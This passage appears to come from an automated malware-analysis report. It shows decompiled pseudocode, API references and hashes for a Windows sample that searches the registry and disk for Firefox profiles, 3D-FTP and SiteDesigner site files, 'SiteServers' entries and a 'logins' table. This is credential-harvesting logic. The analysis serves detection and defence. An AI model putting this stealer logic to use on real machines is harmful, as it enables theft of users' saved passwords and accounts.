				return _t32;
			}

0x00404823
0x00404828
0x0040482a
0x00404830
0x00404837
0x00404837
0x00404863
0x00000000
0x00000000
0x00404871
0x00404894
0x00404907
0x00404907
0x00000000
0x00404907
0x004048b2
0x004048b4
0x00000000
0x00000000
0x004048b6
0x004048c4
0x004048d0
0x004048e3
0x004048d2
0x004048d7
0x004048d7
0x004048f7
0x00404902
0x00000000
0x0040487c
0x0040487c
0x00000000
0x0040487c
0x00404871
0x00000000
0x00404912
0x00404918

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404823
RegEnumValueA.ADVAPI32 ref: 0040485C
StrStrIA.SHLWAPI(?,Line), ref: 0040488D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404912

Strings

Line, xrefs: 00404881

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: Line
API String ID: 4012628704-1898322888
Opcode ID: 2b46cda1a647df25163245a46f888817f96ffd0b22f7560dbeb1d8669d88c653
Instruction ID: c1fe354c5df2d147472c63de0b99e33003b149c2ae87472fa03303622d3e56eb
Opcode Fuzzy Hash: 2b46cda1a647df25163245a46f888817f96ffd0b22f7560dbeb1d8669d88c653
Instruction Fuzzy Hash: 652139B590011CBACF21ABA1CC41AED7BB9BF40304F00C4B6B644B50A0DB799B969F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E380, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E380(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				char* _v2068;
				int _v2072;
				char _v2076;
				long _t27;
				long _t28;
				char* _t37;
				void* _t43;

				_t43 = __ecx;
				_t27 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t28 = _t27;
				if(_t28 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
							break;
						}
						if(_v2072 == 1) {
							_t37 = E00401D71(_a4, _a8,  &_v2064,  &_v2076);
							if(_t37 == 0) {
								L10:
								_v12 = _v12 + 1;
								continue;
							}
							_v2068 = _t37;
							if(StrStrIA(_v2068, ".wjf") != 0) {
								E0040E0FE(_t43, _a12, _v2068);
							}
							E004018B8(_v2068);
							goto L10;
						}
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t28;
			}

0x0040e380
0x0040e393
0x0040e398
0x0040e39a
0x0040e3a0
0x0040e3a7
0x0040e3a7
0x0040e3d3
0x00000000
0x00000000
0x0040e3de
0x0040e3fe
0x0040e400
0x0040e435
0x0040e435
0x00000000
0x0040e435
0x0040e402
0x0040e41a
0x0040e425
0x0040e425
0x0040e430
0x00000000
0x0040e430
0x0040e3e0
0x0040e3e0
0x00000000
0x0040e440
0x0040e446

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E393
RegEnumValueA.ADVAPI32 ref: 0040E3CC
StrStrIA.SHLWAPI(?,.wjf), ref: 0040E413
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E440

Strings

.wjf, xrefs: 0040E408

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: .wjf
API String ID: 4012628704-198459012
Opcode ID: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
Instruction ID: 445ef7b8b1bb7aa2afab0b85c8d47674782cb6e9d867fe5de917610d2ab08f6a
Opcode Fuzzy Hash: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
Instruction Fuzzy Hash: EE110A3191011CBADF11AF51CC41AEEBBB9FF04304F0484B6B554B11A1DBB99BA1AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040456C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040456C(void* __ecx, void* __edx, void* __edi) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed short _v14;
				signed short _v16;
				char _v20;
				char _v120;
				char _v124;
				void* _t19;
				char* _t21;

				_t19 = E004027F7(__ecx, __edx, __edi, "HWID",  &_v124); // executed
				_push(_t19);
				if(_t19 == 0 || _v124 <= 0x14) {
					_t21 =  &_v20;
					_push(_t21);
					L00410796();
					if(_t21 >= 0) {
						wsprintfA( &_v120, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v20, _v16 & 0x0000ffff, _v14 & 0x0000ffff, _v12 & 0x000000ff, _v11 & 0x000000ff, _v10 & 0x000000ff, _v9 & 0x000000ff, _v8 & 0x000000ff, _v7 & 0x000000ff, _v6 & 0x000000ff, _v5 & 0x000000ff);
						_t35 =  &_v120;
						_push( &_v120);
						L0041066A();
						E004026DD("HWID",  &_v120, _t35); // executed
					}
				}
				return E004018B8();
			}

0x0040457b
0x00404580
0x00404583
0x0040458b
0x0040458e
0x0040458f
0x00404596
0x004045d6
0x004045de
0x004045e1
0x004045e2
0x004045f1
0x004045f1
0x00404596
0x004045fc

APIs

Part of subcall function 004027F7: GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
Part of subcall function 004027F7: 73D83240.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028AF
Part of subcall function 004027F7: GlobalFix.KERNEL32 ref: 004028BB
Part of subcall function 004027F7: GlobalUnWire.KERNEL32 ref: 004028DD

73CCF260.OLE32(?,00000000), ref: 0040458F
wsprintfA.USER32 ref: 004045D6
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004045E2

Strings

HWID, xrefs: 00404576, 004045EC
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 004045CD

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Global$D83240F260PathTempWirelstrlenwsprintf
String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
API String ID: 2418552426-1100116640
Opcode ID: 9c8c72e958f692cd5c17bb4aee1ff0ebe95c06f2e591f1655062e6d771a0606b
Instruction ID: f53fd9df19a37a7436308050770a6827e165c979ed20dd1958a16c82b6db0aed
Opcode Fuzzy Hash: 9c8c72e958f692cd5c17bb4aee1ff0ebe95c06f2e591f1655062e6d771a0606b
Instruction Fuzzy Hash: 201139A68041987DDB61E3E68C05EFFBAFC590D305B1404ABB6A0E20C2D57DD780AB39

Uniqueness

Uniqueness Score: -1.00%

Function 00409D44, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409D44(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t18;
				void* _t20;

				_t20 = __eflags;
				_t18 = __ecx;
				_v8 = E004015F0(_a4, 0x24, 0);
				 *0x416030 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E00409C3C(_t18, _a4,  *0x414869, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E00409C3C(_t18, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401636(__ebx, _t18, __edi, _t20, _a4, _v8);
			}

0x00409d44
0x00409d44
0x00409d59
0x00409d5c
0x00409d72
0x00409d8f
0x00409dab
0x00409db7
0x00409dc8

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D72

Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB7

Strings

Software\Mozilla, xrefs: 00409D81, 00409D9E
\Mozilla\Firefox\, xrefs: 00409D77, 00409D94
Firefox, xrefs: 00409D7C, 00409D99

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
API String ID: 3062143572-2631691096
Opcode ID: 31845e8f246ef1c047a1e8acefb0eee754fa816f229e193014710dde568ae4c8
Instruction ID: e7b17ff52d166462a165f3b6913ad71960ce3cd8d7ded6adb1efb220650c7e13
Opcode Fuzzy Hash: 31845e8f246ef1c047a1e8acefb0eee754fa816f229e193014710dde568ae4c8
Instruction Fuzzy Hash: 4EF06270640208BADF20EB51CC47FCD7A659B04704F10807A7644740E3DFB9CAD09A48

Uniqueness

Uniqueness Score: -1.00%

Function 00409F8F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409F8F(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t18;
				void* _t20;

				_t20 = __eflags;
				_t18 = __ecx;
				_v8 = E004015F0(_a4, 0x28, 0);
				 *0x416030 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E00409C3C(_t18, _a4,  *0x414869, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\");
				E00409C3C(_t18, _a4, 0x80000002, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401636(__ebx, _t18, __edi, _t20, _a4, _v8);
			}

0x00409f8f
0x00409f8f
0x00409fa4
0x00409fa7
0x00409fbd
0x00409fda
0x00409ff6
0x0040a002
0x0040a013

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409FBD

Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A002

Strings

Software\Mozilla, xrefs: 00409FCC, 00409FE9
Mozilla, xrefs: 00409FC7, 00409FE4
\Mozilla\Profiles\, xrefs: 00409FC2, 00409FDF

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
API String ID: 3062143572-2716603926
Opcode ID: 131c71901b6e6f8efd938cc30ab034825632f74977321a3e57dc4e4074c16a30
Instruction ID: ad10bed4d9095064944b6f1b39750bb114de016addf6147f224309e21cc9b741
Opcode Fuzzy Hash: 131c71901b6e6f8efd938cc30ab034825632f74977321a3e57dc4e4074c16a30
Instruction Fuzzy Hash: C2F03630680208BADF50BF51CC43FCD7A659B14745F1140667A08751E3DBF9DAD19B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA59, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040CA59(void* __ebx, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				void* _t10;
				void* _t12;
				char* _t20;
				void* _t27;
				void* _t28;
				char* _t29;

				_t28 = __ecx;
				_t27 = __ebx;
				_v8 = E004015F0(_a4, 0x42, 0);
				_t29 =  *0x4147ed; // 0x640b38
				if( *_t29 == 0) {
					L5:
					_t10 = E00401EB1(_t33, 0x23);
					_t34 = _t10;
					if(_t10 != 0) {
						E00404351(_a4, E00401E4C(_t10, _t10, "\\3D-FTP"), "sites.ini", 0xbeef0000); // executed
						E004018B8(_t17);
					}
					_t12 = E00401EB1(_t34, 0x23);
					_t35 = _t12;
					if(_t12 != 0) {
						E00404351(_a4, E00401E4C(_t12, _t12, "\\SiteDesigner"), "sites.ini", 0xbeef0000); // executed
						E004018B8(_t14);
					}
					return E00401636(_t27, _t28, _t29, _t35, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t20 = StrStrIA(_t29, "3D-FTP");
					_t31 = _t20;
					if(_t20 != 0) {
						_t24 = E0040242B(_t31, _t29);
						if(E0040242B(_t31, _t29) != 0) {
							E00404351(_a4, _t24, "sites.ini", 0xbeef0000);
							E004018B8(_t24);
						}
					}
					asm("cld");
					_t28 = 0xffffffff;
					asm("repne scasb");
					_t33 =  *_t29;
				} while ( *_t29 != 0);
				goto L5;
			}

0x0040ca59
0x0040ca59
0x0040ca6c
0x0040ca6f
0x0040ca78
0x0040caba
0x0040cac1
0x0040cac1
0x0040cac3
0x0040cadf
0x0040cae4
0x0040cae4
0x0040caf0
0x0040caf0
0x0040caf2
0x0040cb0e
0x0040cb13
0x0040cb13
0x0040cb25
0x00000000
0x00000000
0x00000000
0x0040ca7a
0x0040ca7a
0x0040ca80
0x0040ca85
0x0040ca87
0x0040ca8f
0x0040ca91
0x0040caa2
0x0040caa7
0x0040caa7
0x0040ca91
0x0040caac
0x0040caaf
0x0040cab4
0x0040cab6
0x0040cab6
0x00000000

APIs

StrStrIA.SHLWAPI(00640B38,3D-FTP), ref: 0040CA80

Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

sites.ini, xrefs: 0040CA99, 0040CAD6, 0040CB05
\3D-FTP, xrefs: 0040CAC5
\SiteDesigner, xrefs: 0040CAF4
3D-FTP, xrefs: 0040CA7A

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
API String ID: 1884169789-4074339522
Opcode ID: f1cda09d36af23cc2d8ad47fd755b2eaecaedc9644cf417539652a50c413c888
Instruction ID: 3a8ef14eedaa50b1c948b24bf2c7183635c18f20d59f5e60411f4875eb663bb9
Opcode Fuzzy Hash: f1cda09d36af23cc2d8ad47fd755b2eaecaedc9644cf417539652a50c413c888
Instruction Fuzzy Hash: D6119E70740105BAEF11B772CC42FAF2D599B81758F24023B7810B11E3DABCCA91A6AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040AED7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AED7(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				char _v2068;
				char _v2072;
				intOrPtr _v2076;
				long _t36;
				long _t37;
				long _t40;

				_t36 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t37 = _t36;
				if(_t37 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t40 = RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v16, 0, 0, 0, 0);
						_t41 = _t40;
						if(_t40 != 0) {
							break;
						}
						_v2076 = E00401DF8( &_v2068, E00401DF8(_t41, _a8, "\\"),  &_v2068);
						E004018B8(_t42);
						_v2072 = E00401D71( *0x414869, _v2076, "SiteServers",  &_v20);
						__eflags = _v2072;
						if(_v2072 == 0) {
							L12:
							E004018B8(_v2072);
							E0040AED7(_a4, _v2076);
							E004018B8(_v2076);
							_v12 = _v12 + 1;
							continue;
						}
						__eflags = _v20 - 4;
						if(_v20 != 4) {
							L11:
							E004018B8(_v2072);
							goto L12;
						}
						 *_t18 =  *_v2072;
						__eflags = _v2072 - 0x3e8;
						if(_v2072 > 0x3e8) {
							_v2072 = 0x3e8;
						}
						while(1) {
							__eflags = _v2072;
							if(_v2072 == 0) {
								goto L11;
							}
							_t21 =  &_v2072;
							 *_t21 = _v2072 - 1;
							__eflags =  *_t21;
							E0040AC3E( *_t21, _a4, _v2076, _v2072);
						}
						goto L11;
					}
					return RegCloseKey(_v8);
				}
				return _t37;
			}

0x0040aeed
0x0040aef2
0x0040aef4
0x0040aefa
0x0040af01
0x0040af01
0x0040af21
0x0040af26
0x0040af28
0x00000000
0x00000000
0x0040af4c
0x0040af52
0x0040af71
0x0040af77
0x0040af7e
0x0040afda
0x0040afe0
0x0040afee
0x0040aff9
0x0040affe
0x00000000
0x0040affe
0x0040af80
0x0040af84
0x0040afcf
0x0040afd5
0x00000000
0x0040afd5
0x0040af8e
0x0040af94
0x0040af9e
0x0040afa0
0x0040afa0
0x0040afc6
0x0040afc6
0x0040afcd
0x00000000
0x00000000
0x0040afac
0x0040afac
0x0040afac
0x0040afc1
0x0040afc1
0x00000000
0x0040afc6
0x00000000
0x0040b009
0x0040b00f

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040AEED
RegEnumKeyExA.ADVAPI32 ref: 0040AF21
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B009

Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACAA
Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACBD
Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACD0
Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACE3
Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACF6
Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD09
Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD1C

Strings

SiteServers, xrefs: 0040AF5B

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: wsprintf$CloseEnumOpen
String ID: SiteServers
API String ID: 1693054222-2402683488
Opcode ID: c23e4e84773bc3363ca8226b34d5d7ab8c1375c3b24122fc359739cd37375137
Instruction ID: a446ecacf4174ee40ccddb23f5ff2609404a5ff37a742fe041fe98d7ce509aa6
Opcode Fuzzy Hash: c23e4e84773bc3363ca8226b34d5d7ab8c1375c3b24122fc359739cd37375137
Instruction Fuzzy Hash: C131287190021DEADF21AB51CD42BDEBAB9FF04304F04C0B6B154750A1DB795BA2AF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408D1E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408D1E(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				long _t28;
				long _t29;
				long _t32;

				_t28 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t29 = _t28;
				if(_t29 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t32 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t33 = _t32;
						if(_t32 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t33, _a12, "\\"),  &_v2064);
						E004018B8(_t34);
						_v2072 = E00401D71(_a8, _v2068, "MRU", 0);
						if(_v2072 != 0) {
							E00404043(_a4, _v2072, 0xbeef0001);
						}
						E004018B8(_v2072);
						E00408D1E(_a4, _a8, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t29;
			}

0x00408d31
0x00408d36
0x00408d38
0x00408d3e
0x00408d45
0x00408d45
0x00408d65
0x00408d6a
0x00408d6c
0x00000000
0x00000000
0x00408d90
0x00408d96
0x00408db0
0x00408dbd
0x00408dcd
0x00408dcd
0x00408dd8
0x00408de9
0x00408df4
0x00408df9
0x00408df9
0x00000000
0x00408e04
0x00408e0a

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408D31
RegEnumKeyExA.ADVAPI32 ref: 00408D65
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E04

Strings

MRU, xrefs: 00408D9D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: MRU
API String ID: 1332880857-344939820
Opcode ID: a218edc76d328d61fb32810b6b901dfa870d265beb811b49ef9bfa557965049c
Instruction ID: 0962f506e68cdd8ccaa0ff695c2f519e513318d4d31b2a5f0dea04bfe0af0b42
Opcode Fuzzy Hash: a218edc76d328d61fb32810b6b901dfa870d265beb811b49ef9bfa557965049c
Instruction Fuzzy Hash: 8821F331900108BADF11AB51CD42FDE7BBABF00304F1085BAB554B50E1DBB95B91AF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401C8D, Relevance: 6.1, APIs: 4, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401C8D(void* _a4, char* _a8, char* _a12, int** _a16, intOrPtr _a20) {
				void* _v8;
				int _v12;
				int _v16;
				int** _t28;
				long _t30;
				char* _t33;
				void* _t36;
				long _t39;
				long _t46;
				signed int _t51;
				char* _t53;

				_t28 = _a16;
				if(_t28 != 0) {
					 *_t28 = 0;
				}
				_t53 = 0;
				if(_a20 != 1) {
					if(_a20 != 2) {
						_t51 = 0;
					} else {
						_t51 = 0x100;
					}
				} else {
					_t51 = 0x200;
				}
				_t30 = RegOpenKeyExA(_a4, _a8, 0, _t51 | 0x00020019,  &_v8); // executed
				if(_t30 == 0) {
					_t39 = RegQueryValueExA(_v8, _a12, 0,  &_v16, 0,  &_v12); // executed
					if(_t39 == 0 && _v12 != 0 && (_v16 != 1 || _v12 != 1)) {
						_t53 = E004018CF(_v12 + 1);
						_t46 = RegQueryValueExA(_v8, _a12, 0, 0, _t53,  &_v12); // executed
						if(_t46 == 0) {
							if(_a16 != 0) {
								_push(_v12);
								_pop( *__eax);
							}
						} else {
							E004018B8(_t53);
							_t53 = 0;
						}
					}
					RegCloseKey(_v8); // executed
				}
				_t33 = _t53;
				if(_t33 != 0 || _a20 >= 2) {
					return _t33;
				} else {
					_t36 = E00401C8D(_a4, _a8, _a12, _a16, _a20 + 1); // executed
					return _t36;
				}
			}

0x00401c97
0x00401c99
0x00401c9b
0x00401c9b
0x00401ca1
0x00401ca7
0x00401cb4
0x00401cbd
0x00401cb6
0x00401cb6
0x00401cb6
0x00401ca9
0x00401ca9
0x00401ca9
0x00401cd2
0x00401cd9
0x00401ced
0x00401cf4
0x00401d12
0x00401d23
0x00401d2a
0x00401d3b
0x00401d3d
0x00401d40
0x00401d40
0x00401d2c
0x00401d2d
0x00401d32
0x00401d32
0x00401d2a
0x00401d45
0x00401d45
0x00401d4c
0x00401d4e
0x00401d6e
0x00401d56
0x00401d67
0x00000000
0x00401d67

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401CD2
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401CED
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401D23
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D45

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 4c5cc07ac999bb8c229a9380f604c2600749c7e7e9e739a1729e69d1632d573e
Instruction ID: f684edda37e69a729a9dfe3678b60f116084d598a8b6b39bf51dbd963b68634d
Opcode Fuzzy Hash: 4c5cc07ac999bb8c229a9380f604c2600749c7e7e9e739a1729e69d1632d573e
Instruction Fuzzy Hash: 36213C31A00109BBEF229E60CD81BAE3BBAEF41344F144076F910A61E0D678EA95DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE0B, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040BE0B(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				void* _t34;
				void* _t49;

				if(_a16 == 5) {
					_t34 = E0040B552(_a12, 2,  &_v8,  &_v12,  &_v16);
					if(_v12 == 1) {
						_push(_v16);
						_pop( *_t8);
						_push("logins");
						_push(_v20);
						L00410712();
						_t34 = _t34;
						if(_t34 == 0) {
							_t34 = E0040B552(_a12, 0,  &_v8,  &_v12,  &_v16);
							if(_v12 == 1) {
								_push(_v16);
								_push("table");
								L004106EE();
								_t34 = _t34;
								if(_t34 == 0) {
									_t34 = E0040B552(_a12, 3,  &_v8,  &_v12,  &_v16);
									if(_v12 == 0) {
										 *_t22 =  *_v16;
										_t34 = E0040B552(_a12, 4,  &_v8,  &_v12,  &_v16);
										if(_v12 == 1) {
											 *0x418e9c = 0xffffffff;
											 *0x418ea0 = 0xffffffff;
											 *0x418ea4 = 0xffffffff;
											_t34 = E0040BAF7(_v16);
											_v28 = 1;
											if( *0x418e9c != 0xffffffff &&  *0x418ea0 != 0xffffffff &&  *0x418ea4 != 0xffffffff) {
												_t49 = E0040B736(__ebx, __ecx, _a4, _a8, _v24,  &_v28, E0040BC36); // executed
												return _t49;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t34;
			}

0x0040be15
0x0040be2c
0x0040be35
0x0040be3b
0x0040be3e
0x0040be41
0x0040be46
0x0040be49
0x0040be4e
0x0040be50
0x0040be67
0x0040be70
0x0040be76
0x0040be79
0x0040be7e
0x0040be83
0x0040be85
0x0040be9c
0x0040bea5
0x0040beb0
0x0040bec4
0x0040becd
0x0040becf
0x0040bed9
0x0040bee3
0x0040bef0
0x0040bef5
0x0040bf03
0x0040bf29
0x00000000
0x0040bf29
0x0040bf03
0x0040becd
0x0040bea5
0x0040be85
0x0040be70
0x0040be50
0x0040be35
0x0040bf2f

APIs

lstrcmpi.KERNEL32(00000000,logins), ref: 0040BE49
lstrcmp.KERNEL32 ref: 0040BE7E

Part of subcall function 0040BAF7: StrStrIA.SHLWAPI(?,() ), ref: 0040BB07

Strings

table, xrefs: 0040BE79
